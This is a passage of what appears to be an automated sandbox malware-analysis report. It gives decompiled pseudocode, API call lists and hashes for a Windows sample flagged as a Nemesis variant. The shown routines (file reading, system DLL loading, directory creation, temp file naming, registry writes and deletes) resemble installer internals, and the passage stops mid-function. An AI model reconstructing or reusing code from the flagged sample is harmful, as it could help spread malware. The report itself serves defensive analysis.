                                                                          C-Code - Quality: 83%
                                                                          			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
                                                                          				intOrPtr _t65;
                                                                          				intOrPtr _t66;
                                                                          				intOrPtr _t72;
                                                                          				void* _t76;
                                                                          				void* _t79;
                                                                          
                                                                          				_t72 = __edx;
                                                                          				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                          				_t65 = 2;
                                                                          				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
                                                                          				_t66 = E00402C15(_t65);
                                                                          				_t79 = _t66 - 1;
                                                                          				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
                                                                          				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
                                                                          				if(_t79 < 0) {
                                                                          					L36:
                                                                          					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                                          				} else {
                                                                          					__ecx = 0x3ff;
                                                                          					if(__eax > 0x3ff) {
                                                                          						 *(__ebp - 0x3c) = 0x3ff;
                                                                          					}
                                                                          					if( *__esi == __bx) {
                                                                          						L34:
                                                                          						__ecx =  *(__ebp - 0xc);
                                                                          						__eax =  *(__ebp - 8);
                                                                          						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                          						if(_t79 == 0) {
                                                                          							 *(_t76 - 4) = 1;
                                                                          						}
                                                                          						goto L36;
                                                                          					} else {
                                                                          						 *(__ebp - 0x30) = __ebx;
                                                                          						 *(__ebp - 0x10) = E004061E2(__ecx, __esi);
                                                                          						if( *(__ebp - 0x3c) > __ebx) {
                                                                          							do {
                                                                          								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
                                                                          									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E55( *(__ebp - 0x10), __ebx) >= 0) {
                                                                          										__eax = __ebp - 0x44;
                                                                          										if(E00405DF7( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
                                                                          											goto L34;
                                                                          										} else {
                                                                          											goto L21;
                                                                          										}
                                                                          									} else {
                                                                          										goto L34;
                                                                          									}
                                                                          								} else {
                                                                          									__eax = __ebp - 0x38;
                                                                          									_push(__ebx);
                                                                          									_push(__ebp - 0x38);
                                                                          									__eax = 2;
                                                                          									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
                                                                          									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
                                                                          									if(__eax == 0) {
                                                                          										goto L34;
                                                                          									} else {
                                                                          										__ecx =  *(__ebp - 0x38);
                                                                          										if(__ecx == __ebx) {
                                                                          											goto L34;
                                                                          										} else {
                                                                          											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                          											 *(__ebp - 0x48) = __ecx;
                                                                          											 *(__ebp - 0x44) = __eax;
                                                                          											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                          												L28:
                                                                          												__ax & 0x0000ffff = E004061C9( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                          											} else {
                                                                          												__ebp - 0x44 = __ebp + 0xa;
                                                                          												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
                                                                          													L21:
                                                                          													__eax =  *(__ebp - 0x44);
                                                                          												} else {
                                                                          													__esi =  *(__ebp - 0x48);
                                                                          													__esi =  ~( *(__ebp - 0x48));
                                                                          													while(1) {
                                                                          														_t22 = __ebp - 0x38;
                                                                          														 *_t22 =  *(__ebp - 0x38) - 1;
                                                                          														__eax = 0xfffd;
                                                                          														 *(__ebp - 0x44) = 0xfffd;
                                                                          														if( *_t22 == 0) {
                                                                          															goto L22;
                                                                          														}
                                                                          														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
                                                                          														__esi = __esi + 1;
                                                                          														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
                                                                          														__ebp - 0x44 = __ebp + 0xa;
                                                                          														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
                                                                          															continue;
                                                                          														} else {
                                                                          															goto L21;
                                                                          														}
                                                                          														goto L22;
                                                                          													}
                                                                          												}
                                                                          												L22:
                                                                          												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                          													goto L28;
                                                                          												} else {
                                                                          													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
                                                                          														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                          															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
                                                                          															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
                                                                          														} else {
                                                                          															__ecx =  *(__ebp - 0xc);
                                                                          															__edx =  *(__ebp - 8);
                                                                          															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                          															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                          														}
                                                                          														goto L34;
                                                                          													} else {
                                                                          														__ecx =  *(__ebp - 0xc);
                                                                          														__edx =  *(__ebp - 8);
                                                                          														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                          														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                          														 *(__ebp - 0x30) = __eax;
                                                                          														if(__ax == __bx) {
                                                                          															goto L34;
                                                                          														} else {
                                                                          															goto L26;
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          								goto L37;
                                                                          								L26:
                                                                          								__eax =  *(__ebp - 8);
                                                                          							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
                                                                          						}
                                                                          						goto L34;
                                                                          					}
                                                                          				}
                                                                          				L37:
                                                                          				return 0;
                                                                          			}









                                                                          APIs
                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                            • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                          • String ID: 9
                                                                          • API String ID: 163830602-2366072709
                                                                          • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                          • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                                          • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                          • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1149 4065ec-40660c GetSystemDirectoryW 1150 406610-406612 1149->1150 1151 40660e 1149->1151 1152 406623-406625 1150->1152 1153 406614-40661d 1150->1153 1151->1150 1154 406626-406659 wsprintfW LoadLibraryExW 1152->1154 1153->1152 1155 40661f-406621 1153->1155 1155->1154
                                                                          C-Code - Quality: 100%
                                                                          			E004065EC(intOrPtr _a4) {
                                                                          				short _v576;
                                                                          				signed int _t13;
                                                                          				struct HINSTANCE__* _t17;
                                                                          				signed int _t19;
                                                                          				void* _t24;
                                                                          
                                                                          				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                          				if(_t13 > 0x104) {
                                                                          					_t13 = 0;
                                                                          				}
                                                                          				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                          					_t19 = 1;
                                                                          				} else {
                                                                          					_t19 = 0;
                                                                          				}
                                                                          				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                          				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                          				return _t17;
                                                                          			}









                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                          • wsprintfW.USER32 ref: 0040663E
                                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                          • API String ID: 2200240437-1946221925
                                                                          • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                          • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                                          • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                          • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1156 4057b5-405800 CreateDirectoryW 1157 405802-405804 1156->1157 1158 405806-405813 GetLastError 1156->1158 1159 40582d-40582f 1157->1159 1158->1159 1160 405815-405829 SetFileSecurityW 1158->1160 1160->1157 1161 40582b GetLastError 1160->1161 1161->1159
                                                                          C-Code - Quality: 100%
                                                                          			E004057B5(WCHAR* _a4) {
                                                                          				struct _SECURITY_ATTRIBUTES _v16;
                                                                          				struct _SECURITY_DESCRIPTOR _v36;
                                                                          				int _t22;
                                                                          				long _t23;
                                                                          
                                                                          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                          				_v36.Owner = 0x4083f0;
                                                                          				_v36.Group = 0x4083f0;
                                                                          				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                          				_v16.lpSecurityDescriptor =  &_v36;
                                                                          				_v36.Revision = 1;
                                                                          				_v36.Control = 4;
                                                                          				_v36.Dacl = 0x4083e0;
                                                                          				_v16.nLength = 0xc;
                                                                          				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                          				if(_t22 != 0) {
                                                                          					L1:
                                                                          					return 0;
                                                                          				}
                                                                          				_t23 = GetLastError();
                                                                          				if(_t23 == 0xb7) {
                                                                          					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                          						goto L1;
                                                                          					}
                                                                          					return GetLastError();
                                                                          				}
                                                                          				return _t23;
                                                                          			}








                                                                          APIs
                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                          • GetLastError.KERNEL32 ref: 0040580C
                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                                          • GetLastError.KERNEL32 ref: 0040582B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                          • String ID: C:\Users\user\Desktop
                                                                          • API String ID: 3449924974-3370423016
                                                                          • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                          • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                                          • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                          • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1162 405da3-405daf 1163 405db0-405de4 GetTickCount GetTempFileNameW 1162->1163 1164 405df3-405df5 1163->1164 1165 405de6-405de8 1163->1165 1167 405ded-405df0 1164->1167 1165->1163 1166 405dea 1165->1166 1166->1167
                                                                          C-Code - Quality: 100%
                                                                          			E00405DA3(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                          				intOrPtr _v8;
                                                                          				short _v12;
                                                                          				short _t12;
                                                                          				intOrPtr _t13;
                                                                          				signed int _t14;
                                                                          				WCHAR* _t17;
                                                                          				signed int _t19;
                                                                          				signed short _t23;
                                                                          				WCHAR* _t26;
                                                                          
                                                                          				_t26 = _a4;
                                                                          				_t23 = 0x64;
                                                                          				while(1) {
                                                                          					_t12 =  *L"nsa"; // 0x73006e
                                                                          					_t23 = _t23 - 1;
                                                                          					_v12 = _t12;
                                                                          					_t13 =  *0x40a55c; // 0x61
                                                                          					_v8 = _t13;
                                                                          					_t14 = GetTickCount();
                                                                          					_t19 = 0x1a;
                                                                          					_v8 = _v8 + _t14 % _t19;
                                                                          					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                          					if(_t17 != 0) {
                                                                          						break;
                                                                          					}
                                                                          					if(_t23 != 0) {
                                                                          						continue;
                                                                          					} else {
                                                                          						 *_t26 =  *_t26 & _t23;
                                                                          					}
                                                                          					L4:
                                                                          					return _t17;
                                                                          				}
                                                                          				_t17 = _t26;
                                                                          				goto L4;
                                                                          			}













                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00405DC1
                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75523420,004035BF), ref: 00405DDC
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DA8, 00405DAC
                                                                          • "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", xrefs: 00405DA3
                                                                          • nsa, xrefs: 00405DB0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                          • API String ID: 1716503409-2392129332
                                                                          • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                          • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                                          • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                          • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 92%
                                                                          			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                          				void _v36;
                                                                          				struct HINSTANCE__* _t34;
                                                                          				intOrPtr _t38;
                                                                          				void* _t44;
                                                                          				void* _t45;
                                                                          				void* _t46;
                                                                          				void* _t50;
                                                                          				intOrPtr _t53;
                                                                          				signed int _t57;
                                                                          				signed int _t61;
                                                                          				void* _t65;
                                                                          				void* _t66;
                                                                          				void* _t70;
                                                                          				void* _t74;
                                                                          
                                                                          				_t74 = __esi;
                                                                          				_t66 = __edi;
                                                                          				_t65 = __edx;
                                                                          				 *0x1000406c = _a8;
                                                                          				 *0x10004070 = _a16;
                                                                          				 *0x10004074 = _a12;
                                                                          				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
                                                                          				_push(1); // executed
                                                                          				_t34 = E10001B18(); // executed
                                                                          				_t50 = _t34;
                                                                          				if(_t50 == 0) {
                                                                          					L28:
                                                                          					return _t34;
                                                                          				} else {
                                                                          					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                          						E10002286(_t50);
                                                                          					}
                                                                          					_push(_t50);
                                                                          					E100022D0(_t65);
                                                                          					_t53 =  *((intOrPtr*)(_t50 + 4));
                                                                          					if(_t53 == 0xffffffff) {
                                                                          						L14:
                                                                          						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
                                                                          							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                                                          								_t34 = E100024A4(_t50);
                                                                          							} else {
                                                                          								_push(_t74);
                                                                          								_push(_t66);
                                                                          								_t12 = _t50 + 0x1018; // 0x1018
                                                                          								_t57 = 8;
                                                                          								memcpy( &_v36, _t12, _t57 << 2);
                                                                          								_t38 = E100015B4(_t50);
                                                                          								_t15 = _t50 + 0x1018; // 0x1018
                                                                          								_t70 = _t15;
                                                                          								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
                                                                          								 *_t70 = 4;
                                                                          								E100024A4(_t50);
                                                                          								_t61 = 8;
                                                                          								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                                                          							}
                                                                          						} else {
                                                                          							E100024A4(_t50);
                                                                          							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
                                                                          						}
                                                                          						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                          							_t34 = E10002467(_t50);
                                                                          							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
                                                                          								_t34 =  *(_t50 + 0x1008);
                                                                          								if(_t34 != 0) {
                                                                          									_t34 = FreeLibrary(_t34);
                                                                          								}
                                                                          							}
                                                                          							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
                                                                          								_t34 = E1000153D( *0x10004068);
                                                                          							}
                                                                          						}
                                                                          						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
                                                                          							goto L28;
                                                                          						} else {
                                                                          							return GlobalFree(_t50);
                                                                          						}
                                                                          					}
                                                                          					_t44 =  *_t50;
                                                                          					if(_t44 == 0) {
                                                                          						if(_t53 != 1) {
                                                                          							goto L14;
                                                                          						}
                                                                          						E10002B57(_t50);
                                                                          						L12:
                                                                          						_t50 = _t44;
                                                                          						L13:
                                                                          						goto L14;
                                                                          					}
                                                                          					_t45 = _t44 - 1;
                                                                          					if(_t45 == 0) {
                                                                          						L8:
                                                                          						_t44 = E1000289C(_t53, _t50); // executed
                                                                          						goto L12;
                                                                          					}
                                                                          					_t46 = _t45 - 1;
                                                                          					if(_t46 == 0) {
                                                                          						E10002640(_t50);
                                                                          						goto L13;
                                                                          					}
                                                                          					if(_t46 != 1) {
                                                                          						goto L14;
                                                                          					}
                                                                          					goto L8;
                                                                          				}
                                                                          			}


















                                                                          APIs
                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                            • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                          • String ID:
                                                                          • API String ID: 1791698881-3916222277
                                                                          • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                          • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                          • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                          • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 83%
                                                                          			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
                                                                          				void* _t20;
                                                                          				void* _t21;
                                                                          				int _t24;
                                                                          				long _t25;
                                                                          				int _t30;
                                                                          				intOrPtr _t33;
                                                                          				void* _t34;
                                                                          				intOrPtr _t37;
                                                                          				void* _t39;
                                                                          				void* _t42;
                                                                          
                                                                          				_t33 = __edx;
                                                                          				_t30 = __ebx;
                                                                          				_t37 =  *((intOrPtr*)(_t39 - 0x18));
                                                                          				_t34 = __eax;
                                                                          				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
                                                                          				 *(_t39 - 0x3c) = E00402C37(2);
                                                                          				_t20 = E00402C37(0x11);
                                                                          				 *(_t39 - 4) = 1;
                                                                          				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
                                                                          				 *(_t39 + 8) = _t21;
                                                                          				if(_t21 != __ebx) {
                                                                          					_t24 = 0;
                                                                          					if(_t37 == 1) {
                                                                          						E00402C37(0x23);
                                                                          						_t24 = lstrlenW(0x40b5d0) + _t29 + 2;
                                                                          					}
                                                                          					if(_t37 == 4) {
                                                                          						 *0x40b5d0 = E00402C15(3);
                                                                          						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
                                                                          						_t24 = _t37;
                                                                          					}
                                                                          					if(_t37 == 3) {
                                                                          						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5d0, 0x1800);
                                                                          					}
                                                                          					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5d0, _t24); // executed
                                                                          					if(_t25 == 0) {
                                                                          						 *(_t39 - 4) = _t30;
                                                                          					}
                                                                          					_push( *(_t39 + 8));
                                                                          					RegCloseKey(); // executed
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                          				return 0;
                                                                          			}














                                                                          APIs
                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,00000023,00000011,00000002), ref: 00402429
                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,00000000,00000011,00000002), ref: 00402469
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,00000000,00000011,00000002), ref: 00402551
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValuelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp
                                                                          • API String ID: 2655323295-4159560630
                                                                          • Opcode ID: d314daa77b1a5bddc68282b153224c2aabf702024f7a5803a7dd81a3f3e5214a
                                                                          • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                                          • Opcode Fuzzy Hash: d314daa77b1a5bddc68282b153224c2aabf702024f7a5803a7dd81a3f3e5214a
                                                                          • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 84%
                                                                          			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                          				void* _v8;
                                                                          				short _v532;
                                                                          				void* _t19;
                                                                          				signed int _t26;
                                                                          				intOrPtr* _t28;
                                                                          				signed int _t33;
                                                                          				signed int _t34;
                                                                          				signed int _t35;
                                                                          
                                                                          				_t34 = _a12;
                                                                          				_t35 = _t34 & 0x00000300;
                                                                          				_t33 = _t34 & 0x00000001;
                                                                          				_t19 = E004060EF(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8); // executed
                                                                          				if(_t19 == 0) {
                                                                          					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
                                                                          						__eflags = _t33;
                                                                          						if(__eflags != 0) {
                                                                          							RegCloseKey(_v8);
                                                                          							return 1;
                                                                          						}
                                                                          						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
                                                                          						__eflags = _t26;
                                                                          						if(_t26 != 0) {
                                                                          							break;
                                                                          						}
                                                                          					}
                                                                          					RegCloseKey(_v8);
                                                                          					_t28 = E0040665C(3);
                                                                          					if(_t28 == 0) {
                                                                          						return RegDeleteKeyW(_a4, _a8);
                                                                          					}
                                                                          					return  *_t28(_a4, _a8, _t35, 0);
                                                                          				}
                                                                          				return _t19;
                                                                          			}












                                                                          APIs
                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Close$Enum
                                                                          • String ID:
                                                                          • API String ID: 464197530-0
                                                                          • Opcode ID: 5909a01bd3e8ace8153d47d3a2ea75d089a0f360c4c69a6458f7b2daf3ea3ca1
                                                                          • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                                          • Opcode Fuzzy Hash: 5909a01bd3e8ace8153d47d3a2ea75d089a0f360c4c69a6458f7b2daf3ea3ca1
                                                                          • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 86%
                                                                          			E004015C1(short __ebx, void* __eflags) {
                                                                          				void* _t17;
                                                                          				int _t23;
